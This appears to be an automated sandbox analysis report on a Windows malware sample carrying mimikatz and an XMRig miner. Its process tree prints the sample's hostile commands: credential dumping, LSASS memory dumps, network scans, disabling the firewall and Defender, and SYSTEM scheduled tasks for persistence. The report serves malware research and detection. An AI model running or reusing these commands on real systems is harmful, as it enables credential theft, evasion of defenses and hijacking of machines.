Analysis

  • max time kernel
    150s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    31-12-2024 23:49

General

  • Target

    2024-12-31_c9c92a0450e5422f65b2a64926908032_hacktools_icedid_mimikatz.exe

  • Size

    7.1MB

  • MD5

    c9c92a0450e5422f65b2a64926908032

  • SHA1

    a9bf1a4860504d2f89bd35c69af5de3386b6a94d

  • SHA256

    cec28df887132034375a64816f3341993f8df494b4a6097e0851025814760037

  • SHA512

    d5776070f98023713b15e62e3cc1ac8a92d1715fd6456a79688dbb6173f2544a5d0fb09de35ff0d01c6971211e9428ce2d1ea03f167752244d5d10f18d8b5c87

  • SSDEEP

    196608:ylTPemknGzwHdOgEPHd9BYX/nivPlTXTYP:a3jz0E52/iv1

Malware Config

Signatures

  • Disables service(s) 3 TTPs
  • Mimikatz

    mimikatz is an open source tool to dump credentials on Windows.

  • Mimikatz family
  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • Xmrig family
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • Contacts a large (29241) amount of remote hosts 1 TTPs

    This may indicate a network scan to discover remotely running services.

  • Creates a large amount of network flows 1 TTPs

    This may indicate a network scan to discover remotely running services.

  • OS Credential Dumping: LSASS Memory 1 TTPs

    Malicious access to Credentials History.

  • XMRig Miner payload 12 IoCs
  • mimikatz is an open source tool to dump credentials on Windows 5 IoCs
  • Drops file in Drivers directory 3 IoCs
  • Event Triggered Execution: Image File Execution Options Injection 1 TTPs 40 IoCs
  • Modifies Windows Firewall 2 TTPs 2 IoCs
  • Executes dropped EXE 28 IoCs
  • Loads dropped DLL 12 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Network Share Discovery 1 TTPs

    Attempt to gather information on host network.

  • Creates a Windows Service
  • Drops file in System32 directory 18 IoCs
  • UPX packed file 36 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Drops file in Program Files directory 3 IoCs
  • Drops file in Windows directory 60 IoCs
  • Launches sc.exe 4 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 51 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

  • NSIS installer 3 IoCs
  • Modifies data under HKEY_USERS 43 IoCs
  • Modifies registry class 14 IoCs
  • Runs net.exe
  • Runs ping.exe 1 TTPs 1 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: LoadsDriver 15 IoCs
  • Suspicious behavior: RenamesItself 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 23 IoCs
  • Suspicious use of SetWindowsHookEx 12 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\System32\spoolsv.exe
    C:\Windows\System32\spoolsv.exe
    1⤵
      PID:2204
      • C:\Windows\TEMP\gcettrccj\zergmt.exe
        "C:\Windows\TEMP\gcettrccj\zergmt.exe"
        2⤵
        • Executes dropped EXE
        • Suspicious use of AdjustPrivilegeToken
        PID:224
    • C:\Users\Admin\AppData\Local\Temp\2024-12-31_c9c92a0450e5422f65b2a64926908032_hacktools_icedid_mimikatz.exe
      "C:\Users\Admin\AppData\Local\Temp\2024-12-31_c9c92a0450e5422f65b2a64926908032_hacktools_icedid_mimikatz.exe"
      1⤵
      • Drops file in Windows directory
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: RenamesItself
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:32
      • C:\Windows\SysWOW64\cmd.exe
        cmd /c ping 127.0.0.1 -n 5 & Start C:\Windows\hrmeszcf\pnreyic.exe
        2⤵
        • System Location Discovery: System Language Discovery
        • System Network Configuration Discovery: Internet Connection Discovery
        • Suspicious use of WriteProcessMemory
        PID:2752
        • C:\Windows\SysWOW64\PING.EXE
          ping 127.0.0.1 -n 5
          3⤵
          • System Location Discovery: System Language Discovery
          • System Network Configuration Discovery: Internet Connection Discovery
          • Runs ping.exe
          PID:1992
        • C:\Windows\hrmeszcf\pnreyic.exe
          C:\Windows\hrmeszcf\pnreyic.exe
          3⤵
          • Executes dropped EXE
          • System Location Discovery: System Language Discovery
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of SetWindowsHookEx
          PID:2616
    • C:\Windows\hrmeszcf\pnreyic.exe
      C:\Windows\hrmeszcf\pnreyic.exe
      1⤵
      • Suspicious use of NtCreateUserProcessOtherParentProcess
      • Drops file in Drivers directory
      • Event Triggered Execution: Image File Execution Options Injection
      • Executes dropped EXE
      • Drops file in System32 directory
      • Drops file in Windows directory
      • System Location Discovery: System Language Discovery
      • Modifies data under HKEY_USERS
      • Modifies registry class
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:1796
      • C:\Windows\SysWOW64\cmd.exe
        cmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
        2⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:4008
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /S /D /c" echo Y"
          3⤵
            PID:1588
          • C:\Windows\SysWOW64\cacls.exe
            cacls C:\Windows\system32\drivers\etc\hosts /T /D users
            3⤵
              PID:4860
            • C:\Windows\SysWOW64\cmd.exe
              C:\Windows\system32\cmd.exe /S /D /c" echo Y"
              3⤵
              • System Location Discovery: System Language Discovery
              PID:1692
            • C:\Windows\SysWOW64\cacls.exe
              cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators
              3⤵
                PID:4472
              • C:\Windows\SysWOW64\cmd.exe
                C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                3⤵
                • System Location Discovery: System Language Discovery
                PID:1900
              • C:\Windows\SysWOW64\cacls.exe
                cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
                3⤵
                • System Location Discovery: System Language Discovery
                PID:5108
            • C:\Windows\SysWOW64\netsh.exe
              netsh ipsec static del all
              2⤵
              • Event Triggered Execution: Netsh Helper DLL
              PID:448
            • C:\Windows\SysWOW64\netsh.exe
              netsh ipsec static add policy name=Bastards description=FuckingBastards
              2⤵
              • Event Triggered Execution: Netsh Helper DLL
              • System Location Discovery: System Language Discovery
              PID:2812
            • C:\Windows\SysWOW64\netsh.exe
              netsh ipsec static add filteraction name=BastardsList action=block
              2⤵
              • Event Triggered Execution: Netsh Helper DLL
              • System Location Discovery: System Language Discovery
              PID:2352
            • C:\Windows\SysWOW64\cmd.exe
              cmd /c C:\Windows\nblmptktz\etgfqftjv\wpcap.exe /S
              2⤵
              • System Location Discovery: System Language Discovery
              • Suspicious use of WriteProcessMemory
              PID:3416
              • C:\Windows\nblmptktz\etgfqftjv\wpcap.exe
                C:\Windows\nblmptktz\etgfqftjv\wpcap.exe /S
                3⤵
                • Drops file in Drivers directory
                • Executes dropped EXE
                • Loads dropped DLL
                • Drops file in System32 directory
                • Drops file in Program Files directory
                • System Location Discovery: System Language Discovery
                • Suspicious use of WriteProcessMemory
                PID:3916
                • C:\Windows\SysWOW64\net.exe
                  net stop "Boundary Meter"
                  4⤵
                  • System Location Discovery: System Language Discovery
                  • Suspicious use of WriteProcessMemory
                  PID:2668
                  • C:\Windows\SysWOW64\net1.exe
                    C:\Windows\system32\net1 stop "Boundary Meter"
                    5⤵
                    • System Location Discovery: System Language Discovery
                    PID:5060
                • C:\Windows\SysWOW64\net.exe
                  net stop "TrueSight Meter"
                  4⤵
                  • System Location Discovery: System Language Discovery
                  • Suspicious use of WriteProcessMemory
                  PID:628
                  • C:\Windows\SysWOW64\net1.exe
                    C:\Windows\system32\net1 stop "TrueSight Meter"
                    5⤵
                    • System Location Discovery: System Language Discovery
                    PID:1472
                • C:\Windows\SysWOW64\net.exe
                  net stop npf
                  4⤵
                  • Suspicious use of WriteProcessMemory
                  PID:2792
                  • C:\Windows\SysWOW64\net1.exe
                    C:\Windows\system32\net1 stop npf
                    5⤵
                      PID:1944
                  • C:\Windows\SysWOW64\net.exe
                    net start npf
                    4⤵
                    • System Location Discovery: System Language Discovery
                    PID:3476
                    • C:\Windows\SysWOW64\net1.exe
                      C:\Windows\system32\net1 start npf
                      5⤵
                        PID:460
                • C:\Windows\SysWOW64\cmd.exe
                  cmd /c net start npf
                  2⤵
                  • System Location Discovery: System Language Discovery
                  PID:536
                  • C:\Windows\SysWOW64\net.exe
                    net start npf
                    3⤵
                    • System Location Discovery: System Language Discovery
                    PID:1624
                    • C:\Windows\SysWOW64\net1.exe
                      C:\Windows\system32\net1 start npf
                      4⤵
                      • System Location Discovery: System Language Discovery
                      PID:2312
                • C:\Windows\SysWOW64\cmd.exe
                  cmd /c net start npf
                  2⤵
                  • System Location Discovery: System Language Discovery
                  PID:2968
                  • C:\Windows\SysWOW64\net.exe
                    net start npf
                    3⤵
                      PID:4508
                      • C:\Windows\SysWOW64\net1.exe
                        C:\Windows\system32\net1 start npf
                        4⤵
                          PID:2752
                    • C:\Windows\SysWOW64\cmd.exe
                      cmd /c C:\Windows\nblmptktz\etgfqftjv\ttsqkuccf.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\nblmptktz\etgfqftjv\Scant.txt
                      2⤵
                      • System Location Discovery: System Language Discovery
                      PID:4816
                      • C:\Windows\nblmptktz\etgfqftjv\ttsqkuccf.exe
                        C:\Windows\nblmptktz\etgfqftjv\ttsqkuccf.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\nblmptktz\etgfqftjv\Scant.txt
                        3⤵
                        • Executes dropped EXE
                        • Loads dropped DLL
                        • System Location Discovery: System Language Discovery
                        PID:1692
                    • C:\Windows\SysWOW64\cmd.exe
                      cmd /c C:\Windows\nblmptktz\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit >> C:\Windows\nblmptktz\Corporate\log.txt
                      2⤵
                      • Drops file in Windows directory
                      • System Location Discovery: System Language Discovery
                      PID:4664
                      • C:\Windows\nblmptktz\Corporate\vfshost.exe
                        C:\Windows\nblmptktz\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit
                        3⤵
                        • Executes dropped EXE
                        • Suspicious use of AdjustPrivilegeToken
                        PID:2956
                    • C:\Windows\SysWOW64\cmd.exe
                      cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "armegntcm" /ru system /tr "cmd /c C:\Windows\ime\pnreyic.exe"
                      2⤵
                        PID:4804
                        • C:\Windows\SysWOW64\cmd.exe
                          C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                          3⤵
                            PID:1740
                          • C:\Windows\SysWOW64\schtasks.exe
                            schtasks /create /sc minute /mo 1 /tn "armegntcm" /ru system /tr "cmd /c C:\Windows\ime\pnreyic.exe"
                            3⤵
                            • System Location Discovery: System Language Discovery
                            • Scheduled Task/Job: Scheduled Task
                            PID:3992
                        • C:\Windows\SysWOW64\cmd.exe
                          cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "szvqemctv" /ru system /tr "cmd /c echo Y|cacls C:\Windows\hrmeszcf\pnreyic.exe /p everyone:F"
                          2⤵
                          • System Location Discovery: System Language Discovery
                          PID:4040
                          • C:\Windows\SysWOW64\cmd.exe
                            C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                            3⤵
                            • System Location Discovery: System Language Discovery
                            PID:3640
                          • C:\Windows\SysWOW64\schtasks.exe
                            schtasks /create /sc minute /mo 1 /tn "szvqemctv" /ru system /tr "cmd /c echo Y|cacls C:\Windows\hrmeszcf\pnreyic.exe /p everyone:F"
                            3⤵
                            • Scheduled Task/Job: Scheduled Task
                            PID:1092
                        • C:\Windows\SysWOW64\cmd.exe
                          cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "rbtkfiyzt" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\gcettrccj\zergmt.exe /p everyone:F"
                          2⤵
                          • System Location Discovery: System Language Discovery
                          PID:3560
                          • C:\Windows\SysWOW64\cmd.exe
                            C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                            3⤵
                            • System Location Discovery: System Language Discovery
                            PID:1068
                          • C:\Windows\SysWOW64\schtasks.exe
                            schtasks /create /sc minute /mo 1 /tn "rbtkfiyzt" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\gcettrccj\zergmt.exe /p everyone:F"
                            3⤵
                            • System Location Discovery: System Language Discovery
                            • Scheduled Task/Job: Scheduled Task
                            PID:4244
                        • C:\Windows\SysWOW64\netsh.exe
                          netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=TCP
                          2⤵
                          • Event Triggered Execution: Netsh Helper DLL
                          • System Location Discovery: System Language Discovery
                          PID:3368
                        • C:\Windows\SysWOW64\netsh.exe
                          netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=UDP
                          2⤵
                          • Event Triggered Execution: Netsh Helper DLL
                          PID:2504
                        • C:\Windows\SysWOW64\netsh.exe
                          netsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList
                          2⤵
                          • Event Triggered Execution: Netsh Helper DLL
                          • System Location Discovery: System Language Discovery
                          PID:720
                        • C:\Windows\SysWOW64\netsh.exe
                          netsh ipsec static set policy name=Bastards assign=y
                          2⤵
                          • Event Triggered Execution: Netsh Helper DLL
                          • System Location Discovery: System Language Discovery
                          PID:1528
                        • C:\Windows\SysWOW64\netsh.exe
                          netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=TCP
                          2⤵
                          • Event Triggered Execution: Netsh Helper DLL
                          • System Location Discovery: System Language Discovery
                          PID:3000
                        • C:\Windows\SysWOW64\netsh.exe
                          netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=UDP
                          2⤵
                          • Event Triggered Execution: Netsh Helper DLL
                          • System Location Discovery: System Language Discovery
                          PID:4052
                        • C:\Windows\SysWOW64\netsh.exe
                          netsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList
                          2⤵
                          • Event Triggered Execution: Netsh Helper DLL
                          • System Location Discovery: System Language Discovery
                          PID:3148
                        • C:\Windows\SysWOW64\netsh.exe
                          netsh ipsec static set policy name=Bastards assign=y
                          2⤵
                          • Event Triggered Execution: Netsh Helper DLL
                          • System Location Discovery: System Language Discovery
                          PID:2820
                        • C:\Windows\SysWOW64\netsh.exe
                          netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=TCP
                          2⤵
                          • Event Triggered Execution: Netsh Helper DLL
                          • System Location Discovery: System Language Discovery
                          PID:4412
                        • C:\Windows\SysWOW64\netsh.exe
                          netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=UDP
                          2⤵
                          • Event Triggered Execution: Netsh Helper DLL
                          PID:936
                        • C:\Windows\SysWOW64\netsh.exe
                          netsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList
                          2⤵
                          • Event Triggered Execution: Netsh Helper DLL
                          PID:4536
                        • C:\Windows\SysWOW64\netsh.exe
                          netsh ipsec static set policy name=Bastards assign=y
                          2⤵
                          • Event Triggered Execution: Netsh Helper DLL
                          • System Location Discovery: System Language Discovery
                          PID:3944
                        • C:\Windows\TEMP\nblmptktz\cntrtrctt.exe
                          C:\Windows\TEMP\nblmptktz\cntrtrctt.exe -accepteula -mp 800 C:\Windows\TEMP\nblmptktz\800.dmp
                          2⤵
                          • Executes dropped EXE
                          • Modifies data under HKEY_USERS
                          • Suspicious use of AdjustPrivilegeToken
                          PID:4472
                        • C:\Windows\SysWOW64\cmd.exe
                          cmd /c net stop SharedAccess
                          2⤵
                          • System Location Discovery: System Language Discovery
                          PID:4816
                          • C:\Windows\SysWOW64\net.exe
                            net stop SharedAccess
                            3⤵
                              PID:3612
                              • C:\Windows\SysWOW64\net1.exe
                                C:\Windows\system32\net1 stop SharedAccess
                                4⤵
                                  PID:700
                            • C:\Windows\SysWOW64\cmd.exe
                              cmd /c netsh firewall set opmode mode=disable
                              2⤵
                                PID:4860
                                • C:\Windows\SysWOW64\netsh.exe
                                  netsh firewall set opmode mode=disable
                                  3⤵
                                  • Modifies Windows Firewall
                                  • Event Triggered Execution: Netsh Helper DLL
                                  • System Location Discovery: System Language Discovery
                                  PID:408
                              • C:\Windows\SysWOW64\cmd.exe
                                cmd /c netsh Advfirewall set allprofiles state off
                                2⤵
                                • System Location Discovery: System Language Discovery
                                PID:2332
                                • C:\Windows\SysWOW64\netsh.exe
                                  netsh Advfirewall set allprofiles state off
                                  3⤵
                                  • Modifies Windows Firewall
                                  • Event Triggered Execution: Netsh Helper DLL
                                  PID:4760
                              • C:\Windows\SysWOW64\cmd.exe
                                cmd /c net stop MpsSvc
                                2⤵
                                  PID:4676
                                  • C:\Windows\SysWOW64\net.exe
                                    net stop MpsSvc
                                    3⤵
                                    • System Location Discovery: System Language Discovery
                                    PID:32
                                    • C:\Windows\SysWOW64\net1.exe
                                      C:\Windows\system32\net1 stop MpsSvc
                                      4⤵
                                      • System Location Discovery: System Language Discovery
                                      PID:4588
                                • C:\Windows\SysWOW64\cmd.exe
                                  cmd /c net stop WinDefend
                                  2⤵
                                  • System Location Discovery: System Language Discovery
                                  PID:4564
                                  • C:\Windows\SysWOW64\net.exe
                                    net stop WinDefend
                                    3⤵
                                    • System Location Discovery: System Language Discovery
                                    PID:3388
                                    • C:\Windows\SysWOW64\net1.exe
                                      C:\Windows\system32\net1 stop WinDefend
                                      4⤵
                                      • System Location Discovery: System Language Discovery
                                      PID:4660
                                • C:\Windows\SysWOW64\cmd.exe
                                  cmd /c net stop wuauserv
                                  2⤵
                                  • System Location Discovery: System Language Discovery
                                  PID:3600
                                  • C:\Windows\SysWOW64\net.exe
                                    net stop wuauserv
                                    3⤵
                                      PID:4092
                                      • C:\Windows\SysWOW64\net1.exe
                                        C:\Windows\system32\net1 stop wuauserv
                                        4⤵
                                          PID:4380
                                    • C:\Windows\SysWOW64\cmd.exe
                                      cmd /c sc config MpsSvc start= disabled
                                      2⤵
                                      • System Location Discovery: System Language Discovery
                                      PID:1364
                                      • C:\Windows\SysWOW64\sc.exe
                                        sc config MpsSvc start= disabled
                                        3⤵
                                        • Launches sc.exe
                                        PID:5068
                                    • C:\Windows\SysWOW64\cmd.exe
                                      cmd /c sc config SharedAccess start= disabled
                                      2⤵
                                      • System Location Discovery: System Language Discovery
                                      PID:1868
                                      • C:\Windows\SysWOW64\sc.exe
                                        sc config SharedAccess start= disabled
                                        3⤵
                                        • Launches sc.exe
                                        PID:652
                                    • C:\Windows\SysWOW64\cmd.exe
                                      cmd /c sc config WinDefend start= disabled
                                      2⤵
                                        PID:2368
                                        • C:\Windows\SysWOW64\sc.exe
                                          sc config WinDefend start= disabled
                                          3⤵
                                          • Launches sc.exe
                                          • System Location Discovery: System Language Discovery
                                          PID:3444
                                      • C:\Windows\SysWOW64\cmd.exe
                                        cmd /c sc config wuauserv start= disabled
                                        2⤵
                                        • System Location Discovery: System Language Discovery
                                        PID:3408
                                        • C:\Windows\SysWOW64\sc.exe
                                          sc config wuauserv start= disabled
                                          3⤵
                                          • Launches sc.exe
                                          • System Location Discovery: System Language Discovery
                                          PID:508
                                      • C:\Windows\TEMP\xohudmc.exe
                                        C:\Windows\TEMP\xohudmc.exe
                                        2⤵
                                        • Executes dropped EXE
                                        • Drops file in System32 directory
                                        • System Location Discovery: System Language Discovery
                                        • Suspicious use of SetWindowsHookEx
                                        PID:5060
                                      • C:\Windows\TEMP\nblmptktz\cntrtrctt.exe
                                        C:\Windows\TEMP\nblmptktz\cntrtrctt.exe -accepteula -mp 316 C:\Windows\TEMP\nblmptktz\316.dmp
                                        2⤵
                                        • Executes dropped EXE
                                        • Modifies data under HKEY_USERS
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:2972
                                      • C:\Windows\TEMP\nblmptktz\cntrtrctt.exe
                                        C:\Windows\TEMP\nblmptktz\cntrtrctt.exe -accepteula -mp 2204 C:\Windows\TEMP\nblmptktz\2204.dmp
                                        2⤵
                                        • Executes dropped EXE
                                        • Modifies data under HKEY_USERS
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:1160
                                      • C:\Windows\TEMP\nblmptktz\cntrtrctt.exe
                                        C:\Windows\TEMP\nblmptktz\cntrtrctt.exe -accepteula -mp 2572 C:\Windows\TEMP\nblmptktz\2572.dmp
                                        2⤵
                                        • Executes dropped EXE
                                        • Modifies data under HKEY_USERS
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:936
                                      • C:\Windows\TEMP\nblmptktz\cntrtrctt.exe
                                        C:\Windows\TEMP\nblmptktz\cntrtrctt.exe -accepteula -mp 2768 C:\Windows\TEMP\nblmptktz\2768.dmp
                                        2⤵
                                        • Executes dropped EXE
                                        • Modifies data under HKEY_USERS
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:3912
                                      • C:\Windows\TEMP\nblmptktz\cntrtrctt.exe
                                        C:\Windows\TEMP\nblmptktz\cntrtrctt.exe -accepteula -mp 2936 C:\Windows\TEMP\nblmptktz\2936.dmp
                                        2⤵
                                        • Executes dropped EXE
                                        • Modifies data under HKEY_USERS
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:4816
                                      • C:\Windows\TEMP\nblmptktz\cntrtrctt.exe
                                        C:\Windows\TEMP\nblmptktz\cntrtrctt.exe -accepteula -mp 776 C:\Windows\TEMP\nblmptktz\776.dmp
                                        2⤵
                                        • Executes dropped EXE
                                        • Modifies data under HKEY_USERS
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:2968
                                      • C:\Windows\TEMP\nblmptktz\cntrtrctt.exe
                                        C:\Windows\TEMP\nblmptktz\cntrtrctt.exe -accepteula -mp 3708 C:\Windows\TEMP\nblmptktz\3708.dmp
                                        2⤵
                                        • Executes dropped EXE
                                        • Modifies data under HKEY_USERS
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:1604
                                      • C:\Windows\TEMP\nblmptktz\cntrtrctt.exe
                                        C:\Windows\TEMP\nblmptktz\cntrtrctt.exe -accepteula -mp 3800 C:\Windows\TEMP\nblmptktz\3800.dmp
                                        2⤵
                                        • Executes dropped EXE
                                        • Modifies data under HKEY_USERS
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:2332
                                      • C:\Windows\TEMP\nblmptktz\cntrtrctt.exe
                                        C:\Windows\TEMP\nblmptktz\cntrtrctt.exe -accepteula -mp 3864 C:\Windows\TEMP\nblmptktz\3864.dmp
                                        2⤵
                                        • Executes dropped EXE
                                        • Modifies data under HKEY_USERS
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:652
                                      • C:\Windows\TEMP\nblmptktz\cntrtrctt.exe
                                        C:\Windows\TEMP\nblmptktz\cntrtrctt.exe -accepteula -mp 3948 C:\Windows\TEMP\nblmptktz\3948.dmp
                                        2⤵
                                        • Executes dropped EXE
                                        • Modifies data under HKEY_USERS
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:4068
                                      • C:\Windows\TEMP\nblmptktz\cntrtrctt.exe
                                        C:\Windows\TEMP\nblmptktz\cntrtrctt.exe -accepteula -mp 2980 C:\Windows\TEMP\nblmptktz\2980.dmp
                                        2⤵
                                        • Executes dropped EXE
                                        • Modifies data under HKEY_USERS
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:1740
                                      • C:\Windows\TEMP\nblmptktz\cntrtrctt.exe
                                        C:\Windows\TEMP\nblmptktz\cntrtrctt.exe -accepteula -mp 4288 C:\Windows\TEMP\nblmptktz\4288.dmp
                                        2⤵
                                        • Executes dropped EXE
                                        • Modifies data under HKEY_USERS
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:4876
                                      • C:\Windows\TEMP\nblmptktz\cntrtrctt.exe
                                        C:\Windows\TEMP\nblmptktz\cntrtrctt.exe -accepteula -mp 4548 C:\Windows\TEMP\nblmptktz\4548.dmp
                                        2⤵
                                        • Executes dropped EXE
                                        • Modifies data under HKEY_USERS
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:1016
                                      • C:\Windows\TEMP\nblmptktz\cntrtrctt.exe
                                        C:\Windows\TEMP\nblmptktz\cntrtrctt.exe -accepteula -mp 3312 C:\Windows\TEMP\nblmptktz\3312.dmp
                                        2⤵
                                        • Executes dropped EXE
                                        • Modifies data under HKEY_USERS
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:2792
                                      • C:\Windows\TEMP\nblmptktz\cntrtrctt.exe
                                        C:\Windows\TEMP\nblmptktz\cntrtrctt.exe -accepteula -mp 3268 C:\Windows\TEMP\nblmptktz\3268.dmp
                                        2⤵
                                        • Executes dropped EXE
                                        • Modifies data under HKEY_USERS
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:3600
                                      • C:\Windows\TEMP\nblmptktz\cntrtrctt.exe
                                        C:\Windows\TEMP\nblmptktz\cntrtrctt.exe -accepteula -mp 3000 C:\Windows\TEMP\nblmptktz\3000.dmp
                                        2⤵
                                        • Executes dropped EXE
                                        • Modifies data under HKEY_USERS
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:1064
                                      • C:\Windows\SysWOW64\cmd.exe
                                        cmd.exe /c C:\Windows\nblmptktz\etgfqftjv\scan.bat
                                        2⤵
                                        • System Location Discovery: System Language Discovery
                                        PID:3660
                                        • C:\Windows\nblmptktz\etgfqftjv\ncgcflyve.exe
                                          ncgcflyve.exe TCP 181.215.0.1 181.215.255.255 7001 512 /save
                                          3⤵
                                          • Executes dropped EXE
                                          • Drops file in Windows directory
                                          • System Location Discovery: System Language Discovery
                                          PID:2036
                                      • C:\Windows\SysWOW64\cmd.exe
                                        cmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
                                        2⤵
                                        • System Location Discovery: System Language Discovery
                                        PID:5996
                                        • C:\Windows\SysWOW64\cmd.exe
                                          C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                          3⤵
                                          • System Location Discovery: System Language Discovery
                                          PID:376
                                        • C:\Windows\SysWOW64\cacls.exe
                                          cacls C:\Windows\system32\drivers\etc\hosts /T /D users
                                          3⤵
                                          • System Location Discovery: System Language Discovery
                                          PID:6004
                                        • C:\Windows\SysWOW64\cmd.exe
                                          C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                          3⤵
                                          • System Location Discovery: System Language Discovery
                                          PID:4676
                                        • C:\Windows\SysWOW64\cacls.exe
                                          cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators
                                          3⤵
                                          • System Location Discovery: System Language Discovery
                                          PID:2016
                                        • C:\Windows\SysWOW64\cmd.exe
                                          C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                          3⤵
                                          • System Location Discovery: System Language Discovery
                                          PID:2136
                                        • C:\Windows\SysWOW64\cacls.exe
                                          cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
                                          3⤵
                                            PID:4916
                                      • C:\Windows\SysWOW64\dipzew.exe
                                        C:\Windows\SysWOW64\dipzew.exe
                                        1⤵
                                        • Executes dropped EXE
                                        • System Location Discovery: System Language Discovery
                                        • Suspicious use of SetWindowsHookEx
                                        PID:3140
                                      • C:\Windows\system32\cmd.EXE
                                        C:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\hrmeszcf\pnreyic.exe /p everyone:F
                                        1⤵
                                          PID:3480
                                          • C:\Windows\system32\cmd.exe
                                            C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                            2⤵
                                              PID:5108
                                            • C:\Windows\system32\cacls.exe
                                              cacls C:\Windows\hrmeszcf\pnreyic.exe /p everyone:F
                                              2⤵
                                                PID:4072
                                            • C:\Windows\system32\cmd.EXE
                                              C:\Windows\system32\cmd.EXE /c C:\Windows\ime\pnreyic.exe
                                              1⤵
                                                PID:2756
                                                • C:\Windows\ime\pnreyic.exe
                                                  C:\Windows\ime\pnreyic.exe
                                                  2⤵
                                                  • Executes dropped EXE
                                                  • Suspicious use of SetWindowsHookEx
                                                  PID:2612
                                              • C:\Windows\system32\cmd.EXE
                                                C:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\TEMP\gcettrccj\zergmt.exe /p everyone:F
                                                1⤵
                                                  PID:4880
                                                  • C:\Windows\system32\cmd.exe
                                                    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                                    2⤵
                                                      PID:1432
                                                    • C:\Windows\system32\cacls.exe
